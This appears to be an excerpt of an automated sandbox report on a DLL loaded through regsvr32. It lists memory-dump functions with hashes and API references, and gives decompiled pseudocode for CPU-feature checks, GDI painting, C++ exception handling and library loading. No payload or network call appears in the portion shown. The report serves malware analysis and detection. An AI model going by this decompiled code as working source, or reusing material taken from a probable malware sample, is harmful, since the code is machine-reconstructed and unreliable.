Instruction Fuzzy Hash: 1A51B4B090038E8FDB88CF68D88A5CE7BF0FB58358F104619E865A6250D3B8D664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 012A5450 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
Instruction ID: cb69f3cd95f752fd342814a2ddac69cb1bee635cc8607151b3f4485134bb15fd
Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
Instruction Fuzzy Hash: 7051ADB490438E8FDB48CF68C88A5DF7BB1FB58348F004A19EC25A6250D3B8D665CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0129CC84 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
Instruction ID: 086baa8ea28028926d5e0b1b141ea1bc8943a525d01090c06148632d2e071293
Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
Instruction Fuzzy Hash: 2141C3B090074E8FDB48DF64C48A5DE7FB0FB68388F104619E81AA6250D378D6A4CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0128FFB8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07

Uniqueness

Uniqueness Score: -1.00%

Function 01298E08 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 01294F18 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03

Uniqueness

Uniqueness Score: -1.00%

Function 012915C8 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800070A0 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x800223a8 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x80007101;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x800223a8; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x800223a8 = r8d;
				 *0x800223ac = r8d;
				return 0;
			}

0x1800070a0
0x1800070a6
0x1800070ab
0x1800070b2
0x1800070b2
0x1800070b9
0x1800070bb
0x1800070c3
0x1800070c9
0x1800070cd
0x1800070d3
0x1800070d7
0x1800070e1
0x1800070eb
0x1800070f6
0x1800070fa
0x180007101
0x18000710f

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010190 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

GetGestureInfo.USER32 ref: 00000001800101C0
CloseGestureInfoHandle.USER32 ref: 0000000180010672

Strings

8, xrefs: 00000001800101AB

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: GestureInfo$CloseHandle
String ID: 8
API String ID: 372500805-4194326291
Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800106E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 0000000180010872
BeginPaint.USER32 ref: 0000000180010889
EndPaint.USER32 ref: 00000001800108B2
PostQuitMessage.USER32 ref: 00000001800108BC
DefWindowProcW.USER32 ref: 00000001800108E3

Strings

i, xrefs: 000000018001083A

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: PaintProcWindow$BeginMessagePostQuit
String ID: i
API String ID: 3181456275-3865851505
Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FCB0 Relevance: 13.7, APIs: 9, Instructions: 204COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 000000018000FCEE
SelectObject.GDI32 ref: 000000018000FD06
Polyline.GDI32 ref: 000000018000FFA3
MoveToEx.GDI32 ref: 000000018000FFE3
LineTo.GDI32 ref: 000000018001000C
MoveToEx.GDI32 ref: 0000000180010038
LineTo.GDI32 ref: 0000000180010061
SelectObject.GDI32 ref: 0000000180010074
DeleteObject.GDI32 ref: 000000018001007F

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Object$LineMoveSelect$CreateDeletePolyline
String ID:
API String ID: 1917832262-0
Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003328 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 66%

			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t128;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t154;
				void* _t173;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				void* _t209;
				signed long long _t219;
				signed long long _t220;
				signed long long _t226;
				long long _t228;
				signed int _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				signed long long _t246;
				long long _t267;
				signed int* _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				signed long long _t284;
				long long _t296;
				signed int _t307;
				unsigned long long _t313;

				_t180 = __esi;
				_t282 = _t283 - 0x28;
				_t284 = _t283 - 0x128;
				_t219 =  *0x80021010; // 0xe153c63ea8e4
				_t220 = _t219 ^ _t284;
				 *(_t282 + 0x10) = _t220;
				_t280 =  *((intOrPtr*)(_t282 + 0x90));
				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
				 *((long long*)(_t284 + 0x68)) = __r8;
				_t236 = __rcx;
				 *((long long*)(_t284 + 0x78)) = __rdx;
				 *(_t282 - 0x68) = _t307;
				 *((char*)(_t284 + 0x60)) = 0;
				_t281 = __r9;
				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
				r14d = _t128;
				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
				if ( *_t236 != 0xe06d7363) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
				E00000001180002D40(_t220);
				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
				E00000001180002D40(_t220);
				_t237 =  *((intOrPtr*)(_t220 + 0x20));
				E00000001180002D40(_t220);
				 *((char*)(_t284 + 0x60)) = 1;
				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
				E00000001180002D40(_t220);
				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
				E00000001180002D40(_t220);
				E00000001180002D40(_t220);
				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
				goto 0x800037b0;
				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t282 - 0x48) = _t280;
				if ( *_t237 != 0xe06d7363) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
				r15d = 0;
				if (_t280[3] - r15d <= 0) goto 0x80003678;
				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
				 *(_t284 + 0x20) = _t280;
				r8d = r14d;
				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
				_t296 =  *((intOrPtr*)(_t282 - 0x28));
				r13d =  *((intOrPtr*)(_t282 - 0x30));
				 *((long long*)(_t282 - 0x80)) = _t296;
				_t146 = r13d;
				asm("inc ecx");
				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t146 - r14d > 0) goto 0x8000366b;
				_t226 =  *(_t282 - 0x60) >> 0x20;
				if (r14d - _t146 > 0) goto 0x8000366b;
				r12d = r15d;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				_t313 =  *(_t282 - 0x58) >> 0x20;
				 *((long long*)(_t282 - 0x70)) = _t267;
				if (r15d == 0) goto 0x80003658;
				_t246 = _t226 + _t226 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t246 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
				E0000000118000241C(_t226);
				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
				 *((long long*)(_t284 + 0x70)) = _t228;
				E0000000118000241C(_t228);
				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
				if (_t176 <= 0) goto 0x800035e8;
				E0000000118000241C(_t228);
				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
				if (_t154 > 0) goto 0x800035ac;
				r12d = r12d + 1;
				if (r12d == r15d) goto 0x8000365f;
				goto 0x80003565;
				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
				 *(_t284 + 0x38) = _t282 - 0x60;
				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
				 *(_t284 + 0x28) = _t282 - 8;
				 *(_t284 + 0x20) = _t280;
				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
				goto 0x80003664;
				goto 0x80003668;
				r15d = 0;
				r13d = r13d + 1;
				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
				_t209 = _t280[8] - r15d;
				if (_t209 == 0) goto 0x8000369e;
				E00000001180002408(_t282 - 8);
				if (_t209 != 0) goto 0x800036bf;
				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
				if (_t280[8] == r15d) goto 0x800036e4;
				E00000001180002408(_t282 - 8 + _t280[8]);
				_t235 = _t280[8];
				goto 0x800036e7;
				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
				_t177 =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) = _t177;
				_t178 = _t177 | 0xffffffff;
				 *((long long*)(_t284 + 0x48)) = _t281;
				 *(_t284 + 0x40) = _t313;
				 *(_t284 + 0x38) = _t178;
				 *(_t284 + 0x30) = _t178;
				 *(_t284 + 0x28) = _t280;
				 *(_t284 + 0x20) = _t313;
				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
				goto 0x80003784;
				if (_t280[3] <= 0) goto 0x80003784;
				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
				 *(_t284 + 0x38) = _t307;
				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
				 *(_t284 + 0x28) = r14d;
				 *(_t284 + 0x20) = _t280;
				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
				_t173 = E00000001180002D40(_t235);
				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
			}

0x180003328
0x180003335
0x18000333a
0x180003341
0x180003348
0x18000334b
0x18000334f
0x180003359
0x180003363
0x180003368
0x18000336b
0x180003376
0x18000337d
0x180003382
0x180003385
0x18000338a
0x180003390
0x180003399
0x1800033a5
0x1800033af
0x1800033c0
0x1800033cb
0x1800033d1
0x1800033db
0x1800033e1
0x1800033e6
0x1800033ea
0x1800033f3
0x1800033fc
0x180003401
0x18000340c
0x180003412
0x18000341f
0x180003426
0x18000342c
0x180003436
0x180003438
0x180003441
0x18000344c
0x180003458
0x180003464
0x18000346a
0x180003478
0x18000347c
0x180003486
0x180003490
0x1800034a1
0x1800034a7
0x1800034ae
0x1800034be
0x1800034c9
0x1800034ce
0x1800034d1
0x1800034d6
0x1800034da
0x1800034df
0x1800034e4
0x1800034eb
0x1800034f1
0x1800034f5
0x1800034f9
0x180003508
0x180003517
0x180003521
0x180003524
0x180003528
0x18000352f
0x180003539
0x180003540
0x180003546
0x18000354c
0x180003554
0x180003558
0x18000355f
0x180003568
0x18000356c
0x180003570
0x180003574
0x180003578
0x18000357b
0x18000358c
0x18000358f
0x180003594
0x1800035a1
0x1800035a4
0x1800035aa
0x1800035ac
0x1800035c7
0x1800035d2
0x1800035d8
0x1800035de
0x1800035e0
0x1800035e6
0x1800035e8
0x1800035ee
0x1800035f4
0x180003612
0x18000361a
0x180003622
0x18000362d
0x180003635
0x18000363e
0x180003647
0x18000364c
0x180003651
0x180003656
0x18000365d
0x180003668
0x18000366b
0x180003672
0x180003684
0x18000368a
0x18000368e
0x180003690
0x18000369c
0x1800036a6
0x1800036b9
0x1800036c7
0x1800036d1
0x1800036d3
0x1800036db
0x1800036e2
0x1800036f1
0x180003704
0x180003709
0x18000371a
0x18000371e
0x180003721
0x180003726
0x18000372b
0x18000372f
0x180003736
0x18000373b
0x180003740
0x180003745
0x18000374b
0x180003754
0x180003763
0x18000376b
0x180003772
0x18000377a
0x18000377f
0x180003784
0x18000378e
0x1800037af

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000000180003385

Part of subcall function 000000018000427C: __GetUnwindTryBlock.LIBCMT ref: 00000001800042BF
Part of subcall function 000000018000427C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000001800042E4

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000000018000345D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000001800036B2
std::bad_alloc::bad_alloc.LIBCMT ref: 00000001800037BE

Strings

csm, xrefs: 000000018000339F
csm, xrefs: 0000000180003406
csm, xrefs: 0000000180003480

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A3DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0000000118000A3DC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t35;
				signed long long _t56;
				intOrPtr _t60;
				void* _t71;
				signed long long _t72;
				long long _t78;
				void* _t82;
				signed long long _t88;
				signed long long _t89;
				signed long long _t90;
				WCHAR* _t91;
				long _t94;
				void* _t97;
				WCHAR* _t102;

				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x10)) = _t78;
				 *((long long*)(_t82 + 0x18)) = __rsi;
				r15d = __ecx;
				_t72 = _t71 | 0xffffffff;
				_t89 =  *0x80021010; // 0xe153c63ea8e4
				_t88 =  *(0x180000000 + 0x226f0 + _t102 * 8) ^ _t89;
				asm("dec ecx");
				if (_t88 == _t72) goto 0x8000a51f;
				if (_t88 == 0) goto 0x8000a441;
				_t56 = _t88;
				goto 0x8000a521;
				if (__r8 == __r9) goto 0x8000a504;
				_t60 =  *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8));
				if (_t60 == 0) goto 0x8000a469;
				if (_t60 != _t72) goto 0x8000a55e;
				goto 0x8000a4f0;
				r8d = 0x800;
				LoadLibraryExW(_t102, _t97, _t94);
				if (_t56 != 0) goto 0x8000a53e;
				if (GetLastError() != 0x57) goto 0x8000a4de;
				_t14 = _t56 - 0x50; // -80
				_t35 = _t14;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = _t35;
				if (E00000001180007070(__r8) == 0) goto 0x8000a4de;
				r8d = 0;
				LoadLibraryExW(_t91, _t71);
				if (_t56 != 0) goto 0x8000a53e;
				 *((intOrPtr*)(0x180000000 + 0x22640 + __rsi * 8)) = _t72;
				if (__r8 + 4 != __r9) goto 0x8000a44a;
				_t90 =  *0x80021010; // 0xe153c63ea8e4
				asm("dec eax");
				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
				return 0;
			}

0x18000a3dc
0x18000a3e1
0x18000a3e6
0x18000a3f8
0x18000a402
0x18000a418
0x18000a41f
0x18000a428
0x18000a42e
0x18000a437
0x18000a439
0x18000a43c
0x18000a444
0x18000a44d
0x18000a459
0x18000a45e
0x18000a464
0x18000a476
0x18000a47c
0x18000a488
0x18000a497
0x18000a499
0x18000a499
0x18000a49f
0x18000a4b0
0x18000a4b2
0x18000a4c6
0x18000a4c8
0x18000a4d0
0x18000a4dc
0x18000a4e8
0x18000a4f7
0x18000a4fd
0x18000a511
0x18000a517
0x18000a53d

APIs

FreeLibrary.KERNEL32 ref: 000000018000A558
GetProcAddress.KERNEL32 ref: 000000018000A564

Strings

api-ms-, xrefs: 000000018000A4A2
ext-ms-, xrefs: 000000018000A4B5

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300

Uniqueness

Uniqueness Score: -1.00%

